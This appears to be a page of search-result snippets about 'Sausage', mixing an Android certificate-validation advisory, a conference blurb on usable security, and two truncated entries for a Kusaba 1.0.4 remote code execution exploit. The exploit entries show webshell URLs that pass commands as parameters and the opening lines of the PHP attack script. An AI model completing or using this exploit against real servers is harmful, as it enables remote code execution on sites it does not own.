Information disclosure

The Mr.Sausage aka com.appmrsausage.layout application 1.301 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

Kusaba <= 1.0.4 - Remote Code Execution Exploit

No description provided by source. ?php / 9 Oct 2008 Kusaba = 1.0.4 Remote Code Execution Sausage [email protected] After execution: http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print Hello; http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello / $shellname =...

SAUSAGE Con Delves into IT Security's 'Human Problem'

‘Why is security so hard?’ That’s the question that a new conference focused on “useable security” will attempt to answer by bringing together experts on security, software development and human-computer interaction. DEK: ‘Why is security so hard?’ That’s the question that a new conference will...

kusaba1-exec.txt

After execution: http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello"; http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello / $shellname = 'oekaki.php'; // any filename ending in php $server = 'http://www.kusaba.image.board/url/'; // BBS website, with trailing...